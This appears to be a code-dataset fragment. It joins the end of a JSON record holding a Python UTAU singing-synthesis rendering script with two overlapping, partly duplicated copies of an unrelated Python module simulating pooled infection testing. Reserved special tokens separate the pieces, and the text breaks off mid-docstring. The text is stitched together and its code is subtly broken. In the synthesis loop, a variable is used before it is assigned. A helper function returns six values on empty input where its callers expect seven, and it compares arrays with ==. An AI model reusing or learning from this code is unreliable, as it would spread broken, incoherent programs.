"step-5": "from Modules.Pitch.Factory import MainFactory\r\nfrom Modules.ToJson import Oto \r\nfrom audiolazy.lazy_midi import midi2str\r\nimport utaupy\r\nimport string\r\nimport random\r\nimport math\r\nimport os, subprocess, shutil\r\n\r\ndef RandomString(Length):\r\n\tLetters = string.ascii_lowercase\r\n\treturn ''.join(random.choice(Letters) for i in range(Length))\r\n\r\nUST_FILE = \"filet.ust\"\r\nOTO_FILE = \"Voice\\\\NanaMio\\\\oto.ini\"\r\nVB_PATH = \"Voice\\\\NanaMio\"\r\nRESAMPLER_PATH = \"Resampler\\\\macres.exe\"\r\nWAVTOOL_PATH = \"Resampler\\\\wavtool-yawu.exe\"\r\nCACHE_PATH = \"Cache\\\\\"\r\nOUTPUT_FILE = \"temp.wav\"\r\nUstObject = utaupy.ust.load(UST_FILE)\r\nOtoObject = Oto(OTO_FILE)\r\nUstParts = UstObject.notes[4:28]\r\n\r\nshutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))\r\nos.mkdir(os.path.join(os.getcwd(), CACHE_PATH))\r\n\r\nPreviousNote = -1\r\nPreviousLength = 0\r\nTempo = round(float(UstObject.tempo))\r\nMSPassed = 0\r\nopen(OUTPUT_FILE, \"w+\")\r\nfor NIndex, Note in enumerate(UstParts):\r\n\tprint(\"prevnote\", PreviousNote)\r\n\tRest = False\r\n\tif Note.lyric in OtoObject.keys():\r\n\t\tLocalOto = OtoObject[Note.lyric]\r\n\telse:\r\n\t\tLocalOto = None\r\n\t\tRest = True\r\n\r\n\tLyric = Note.lyric\r\n\tLength = Note.length\r\n\tNoteNum = Note.notenum\r\n\tPreUtterance = float(LocalOto[\"PreUtterance\"]) if not Rest else 0\r\n\tVelocity = Note.velocity\r\n\r\n\t# try:\r\n\t# \tPreUtterance = Note.get_by_key(\"PreUtterance\")\r\n\t# except KeyError:\r\n\t# \tPreUtterance = 0\r\n\r\n\ttry:\r\n\t\tStartPoint = Note.get_by_key(\"StartPoint\")\r\n\texcept KeyError:\r\n\t\tStartPoint = 0\r\n\r\n\ttry:\r\n\t\tPBS = Note.pbs\r\n\texcept KeyError:\r\n\t\tPBS = None\r\n\t\r\n\ttry:\r\n\t\tPBW = Note[\"PBW\"].split(\",\")\r\n\texcept KeyError:\r\n\t\tPBW = None\r\n\r\n\ttry:\r\n\t\tPBY = Note[\"PBY\"].split(\",\")\r\n\t\tfor Index, Var in enumerate(PBY):\r\n\t\t\tif Var == \"\":\r\n\t\t\t\tPBY[Index] = \"0\"\r\n\texcept KeyError:\r\n\t\tPBY = []\r\n\r\n\ttry:\r\n\t\tPBM = Note.pbm\r\n\texcept KeyError:\r\n\t\tPBM = []\r\n\r\n\ttry:\r\n\t\tVBR = Note.get_by_key(\"VBR\").split(\",\")\r\n\texcept KeyError:\r\n\t\tVBR = None\r\n\r\n\ttry:\r\n\t\tFlags = Note.get_by_key(\"Flags\")\r\n\texcept KeyError:\r\n\t\tFlags = \"?\"\r\n\r\n\ttry:\r\n\t\tModulation = Note.get_by_key(\"Modulation\")\r\n\texcept KeyError:\r\n\t\tModulation = 100\r\n\r\n\ttry:\r\n\t\tIntensity = Note.get_by_key(\"Intensity\")\r\n\texcept KeyError:\r\n\t\tIntensity = 100\r\n\r\n\ttry:\r\n\t\tStartPoint = Note.get_by_key(\"StartPoint\")\r\n\texcept KeyError:\r\n\t\tStartPoint = 0\r\n\r\n\ttry:\r\n\t\tEnvelope = Note.get_by_key(\"Envelope\")\r\n\t\tEnvelope = Envelope.replace(\"%\", LocalOto[\"Overlap\"]).split(\",\")\r\n\texcept (KeyError, TypeError):\r\n\t\tEnvelope = [\"0\",\"5\",\"35\",\"0\",\"100\",\"100\",\"0\"]\r\n\r\n\tFileOrder = f\"{NIndex:05}\"\r\n\tif Rest:\r\n\t\t# Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH),os.path.join(os.getcwd(), CACHE_PATH, SILENCE_FILE), os.path.join(os.getcwd(),f\"{FileOrder}_Blank_{RandomString(6)}.wav\"),utaupy.ust.notenum_as_abc(NoteNum),\"100\",\"?\",\"0\",str(int(Length//50 *50 if Length/50 - Length//50 < 0.5 else math.ceil(Length/50) * 50)),\"0\",\"0\",\"100\",\"0\"]\r\n\t\t# Segment = AudioSegment.silent(duration=Length)\r\n\t\tWavtoolParam = [\r\n\t\t\tos.path.join(os.getcwd(), WAVTOOL_PATH), \r\n\t\t\tos.path.join(os.getcwd(), OUTPUT_FILE), \r\n\t\t\tOutputFile, \r\n\t\t\tstr(MSPassed), \r\n\t\t\tstr(Length)\r\n\t\t] + ([\"0\"] * 11)\r\n\t\tPreviousNote = -1\r\n\t\tMSPassed += float(Length)\r\n\t\tsubprocess.call(WavtoolParam)\r\n\telse:\r\n\t\tif PreviousNote == -1:\r\n\t\t\tPrevNote = NoteNum\r\n\t\telse:\r\n\t\t\tPrevNote = int(PreviousNote)\r\n\r\n\t\tif PBS is not None and PBW is not None:\r\n\t\t\tPB = MainFactory()\r\n\t\t\tPB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW, PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=PBM, VBR=VBR)\r\n\t\t\tPitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed + PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) / 5)), NoteNum)\r\n\t\telse:\r\n\t\t\tPitchBendData = None\r\n\r\n\r\n\t\t# Bite Correction (The previous note should last for half the length before overlap)\r\n\t\tif PreUtterance - float(LocalOto[\"Overlap\"]) > (PreviousLength // 2):\r\n\t\t\tCorrectionRate = (PreviousLength // 2) / (PreUtterance - float(LocalOto[\"Overlap\"]))\r\n\t\t\tBitedPreUtterance = PreUtterance * CorrectionRate\r\n\t\t\tBitedOverlap = float(LocalOto[\"Overlap\"]) * CorrectionRate\r\n\t\telse:\r\n\t\t\tBitedPreUtterance = PreUtterance\r\n\t\t\tBitedOverlap = float(LocalOto[\"Overlap\"])\r\n\r\n\t\tBitedSTP = PreUtterance - BitedPreUtterance \r\n\r\n\t\tLengthRequire = Length + float(StartPoint) - BitedSTP + BitedOverlap + 50\r\n\t\tif LengthRequire < float(LocalOto[\"Consonant\"]):\r\n\t\t\tLengthRequire = float(LocalOto[\"Consonant\"])\r\n\r\n\t\tLengthRequire = LengthRequire//50 *50 if LengthRequire/50 - LengthRequire//50 < 0.5 else math.ceil(LengthRequire/50) * 50\r\n\r\n\t\tInputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto[\"File\"])\r\n\t\tOutputFile = os.path.join(os.getcwd(), CACHE_PATH, f\"{FileOrder}_{Lyric}_{RandomString(6)}.wav\")\r\n\r\n\t\tParameters = [\r\n\t\t\tos.path.join(os.getcwd(), RESAMPLER_PATH),\r\n\t\t\tInputFile, \r\n\t\t\tOutputFile,\r\n\t\t\tmidi2str(NoteNum),\r\n\t\t\tstr(Velocity),\r\n\t\t\tFlags,\r\n\t\t\tLocalOto[\"Offset\"],\r\n\t\t\tstr(int(LengthRequire)),\r\n\t\t\tLocalOto[\"Consonant\"],\r\n\t\t\tLocalOto[\"Cutoff\"],\r\n\t\t\tIntensity,\r\n\t\t\tModulation,\r\n\t\t\tf\"!{Tempo}\" if PitchBendData is not None else \"\",\r\n\t\t\tf\"{PitchBendData}\" if PitchBendData is not None else \"\"\r\n\t\t]\r\n\r\n\t\tprint(Parameters)\r\n\r\n\t\tPreviousNote = NoteNum\r\n\t\tPreviousLength = float(Length)\r\n\t\tMSPassed += float(Length)\r\n\t\tsubprocess.call(Parameters)\r\n\r\n\t\tif NIndex + 1 < len(UstParts) and UstParts[NIndex+1].lyric in OtoObject.keys():\r\n\t\t\tNextOto = OtoObject[UstParts[NIndex+1].lyric]\r\n\t\t\tNextPreUtterance = float(NextOto[\"PreUtterance\"])\r\n\t\t\tNextOverlap = float(NextOto[\"Overlap\"])\r\n\r\n\t\t\tWavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap\r\n\t\telse:\r\n\t\t\tWavtoolCorrection = PreUtterance\r\n\r\n\t\tsign = \"+\" if WavtoolCorrection >= 0 else \"\"\r\n\t\tWavtoolParam = [\r\n\t\t\tos.path.join(os.getcwd(), WAVTOOL_PATH), \r\n\t\t\tos.path.join(os.getcwd(), OUTPUT_FILE), \r\n\t\t\tOutputFile, \r\n\t\t\tstr(float(StartPoint)), \r\n\t\t\tf\"{Length}@{float(Tempo)}{sign}{WavtoolCorrection}\"\r\n\t\t] + [str(i) for i in Envelope] \r\n\r\n\t\tsubprocess.call(WavtoolParam)\r\n\r\n\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@njit(parallel=True)
def parallel_test(subject_array, typeII_error, typeI_error, num):
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))
for i in range(len(subject_array)):
subject = subject_array[i, 1]
if subject == 1:
temp = 1 if max(random_table[i, :]) > typeII_error else 0
elif subject == 0:
temp = 1 if min(random_table[i, :]) < typeI_error else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * num, len(subject_array) * num
def infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the negative batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the negative batch
"""
q = 1 - p
r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **
batch_size + typeII_error * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the positive batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the positive batch
"""
q = 1 - p
r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **
batch_size + (1 - typeII_error) * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,
n_initial_guess=2):
"""
A function gives (float) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess(float): the initial guess
Output:
(float): the optimal batch size
"""
q = 1 - prevalence_rate
func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *
np.log(q)) ** (-1 / 2)
n_solution = fsolve(func, n_initial_guess)
return float(n_solution)
<|reserved_special_token_0|>
def helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,
batch_limit):
"""
The helpfunction is a handy function to give the list of subjects on the
negative batch(es), the list of subjects on the postive batch(es), the
test-kit consumption, the infection rate on the negative batches, the
infection rate on the positive batches, the optimal batch size for
negative batches and the optimal batch size for positive batches.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
p (float): Infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
batch_limit (int): batch size upper limit
Output:
temp0 (Numpy Array): an array of subjects on the negative batch(es)
temp1 (Numpy Array): an array of subjects on the postive batch(es)
temp_con (int): the number of test-kit consumptions
p0 (float): the infection rate on the negative batches
p1 (float): the infection rate on the positive batches
n0 (float): the optimal batch size for the negative batches
n1 (float): the optimal batch size for the positive batches
"""
batch_size = min(batch_size, batch_limit)
p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,
typeI_error)
p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,
typeI_error)
n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)
n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)
if subject_array == np.array([]):
return np.array([]), np.array([]), p0, p1, n0, n1
temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,
typeII_error, typeI_error)
return temp0, temp1, temp_con, p0, p1, n0, n1
def seq_test(subject_array, stop_rule, p, batch_size, typeII_error,
typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
<|reserved_special_token_0|>
@jit(parallel=True)
def data_gen(size, p):
"""
data_gen provides a faster way to generate a random population with
infection rate p.
Input:
size (int): the size of population
p (float): the infection rate
Output:
test_array (array): the first column is for id and the second column
is the condition, where 1 stands for infection and 0 stands for uninfection
"""
random_table = np.random.binomial(size=size, p=p, n=1)
test_array = np.zeros((size, 2), dtype=int)
for i in range(size):
test_array[i, 0] = i
test_array[i, 1] = random_table[i]
return test_array
<|reserved_special_token_0|>
def fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of positive batches to enter the individual testing phase
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of potential individual testing for the positive crossings
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error)
temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[
'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':
batch_size}
temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[
'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':
batch_size}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
def name_fun(n):
"""
input: stopping rule
output: finish nodes
"""
output = []
temp = ['']
for i in range(2 * n - 1):
temp_cur = []
for j in temp:
candidate_pos = j + '+'
candidate_neg = j + '-'
if str.count(candidate_pos, '+') >= n:
output.append(candidate_pos)
else:
temp_cur.append(candidate_pos)
if str.count(candidate_neg, '-') >= n:
output.append(candidate_neg)
else:
temp_cur.append(candidate_neg)
temp = temp_cur
neg_symbol = [x for x in output if str.count(x, '-') == n]
pos_symbol = [x for x in output if str.count(x, '+') == n]
return output, neg_symbol, pos_symbol
def seq_test_with_node(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,
batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
batch_num_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size, 'node': ''}
temp_list.append(temp)
new_list = []
neg_array = []
neg_node = []
pos_node = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +
'+'}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
batch_num_list.append(consum)
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
temp = [[x, j['node']] for x in j['data'][:, 0]]
neg_node.append(temp)
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
temp = [[x, k['node']] for x in k['data'][:, 0]]
pos_node.append(temp)
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
pos_node.extend(neg_node)
node = pos_node
node = sum(node, [])
node.sort()
node = [x[1] for x in node]
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con, node, batch_num_list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@jit(parallel=True)
def conventional_test(subject_array, typeII_error, typeI_error, repeat=1,
seq=True):
"""
A function gives the test results to a subject array given the probability of
type II error, the probability of Type I error, and the number of repeatition,
and setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
test_result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
"""
if seq == True:
consum = 0
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
j = 0
subject = subject_array[i, 1]
while j < repeat and temp == 0:
random_num = random_table[i, j]
consum += 1
if subject == 1:
temp = 1 if random_num > typeII_error else 0
else:
temp = 1 if random_num < typeI_error else 0
j += 1
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, consum
else:
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
for j in range(repeat):
temp_random = random_table[i, j]
if subject_array[i, 1] == 1:
temp_1 = 1 if temp_random > typeII_error else 0
elif subject_array[i, 1] == 0:
temp_1 = 1 if temp_random < typeI_error else 0
temp += temp_1
temp = 1 if temp >= repeat / 2 else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * repeat
@njit(parallel=True)
def parallel_test(subject_array, typeII_error, typeI_error, num):
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))
for i in range(len(subject_array)):
subject = subject_array[i, 1]
if subject == 1:
temp = 1 if max(random_table[i, :]) > typeII_error else 0
elif subject == 0:
temp = 1 if min(random_table[i, :]) < typeI_error else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * num, len(subject_array) * num
def infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the negative batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the negative batch
"""
q = 1 - p
r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **
batch_size + typeII_error * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the positive batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the positive batch
"""
q = 1 - p
r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **
batch_size + (1 - typeII_error) * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,
n_initial_guess=2):
"""
A function gives (float) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess(float): the initial guess
Output:
(float): the optimal batch size
"""
q = 1 - prevalence_rate
func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *
np.log(q)) ** (-1 / 2)
n_solution = fsolve(func, n_initial_guess)
return float(n_solution)
<|reserved_special_token_0|>
def neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):
"""
A function gives a list of sujects on the negative batch(es),
a list of subjects on the postive batch(es) and the test-kit
consumption given the probability of type II error, the
probability of Type I error.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
Output:
neg_batch (Numpy Array): an array of subjects on the negative batch(es)
pos_batch (Numpy Array): an array of subjects on the postive batch(es)
test_consum (int): the number of test-kit consumptions
"""
neg_batch = []
pos_batch = []
test_consum = np.ceil(len(subject_array) / batch_size)
random_table = np.random.uniform(0, 1, int(test_consum))
i = 0
for temp_batch in np.array_split(subject_array, test_consum):
if 1 in temp_batch[:, 1]:
if random_table[i] > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table[i] > typeI_error:
neg_batch.append(temp_batch)
else:
pos_batch.append(temp_batch)
i += 1
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([
])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([
])
return neg_batch, pos_batch, test_consum
def helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,
batch_limit):
"""
The helpfunction is a handy function to give the list of subjects on the
negative batch(es), the list of subjects on the postive batch(es), the
test-kit consumption, the infection rate on the negative batches, the
infection rate on the positive batches, the optimal batch size for
negative batches and the optimal batch size for positive batches.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
p (float): Infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
batch_limit (int): batch size upper limit
Output:
temp0 (Numpy Array): an array of subjects on the negative batch(es)
temp1 (Numpy Array): an array of subjects on the postive batch(es)
temp_con (int): the number of test-kit consumptions
p0 (float): the infection rate on the negative batches
p1 (float): the infection rate on the positive batches
n0 (float): the optimal batch size for the negative batches
n1 (float): the optimal batch size for the positive batches
"""
batch_size = min(batch_size, batch_limit)
p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,
typeI_error)
p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,
typeI_error)
n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)
n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)
if subject_array == np.array([]):
return np.array([]), np.array([]), p0, p1, n0, n1
temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,
typeII_error, typeI_error)
return temp0, temp1, temp_con, p0, p1, n0, n1
def seq_test(subject_array, stop_rule, p, batch_size, typeII_error,
typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
<|reserved_special_token_0|>
def specificity_score(y_true, y_pred):
"""
A function provides specificty given the prediction and the truth
"""
tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()
return tn / (tn + fp)
@jit(parallel=True)
def data_gen(size, p):
"""
data_gen provides a faster way to generate a random population with
infection rate p.
Input:
size (int): the size of population
p (float): the infection rate
Output:
test_array (array): the first column is for id and the second column
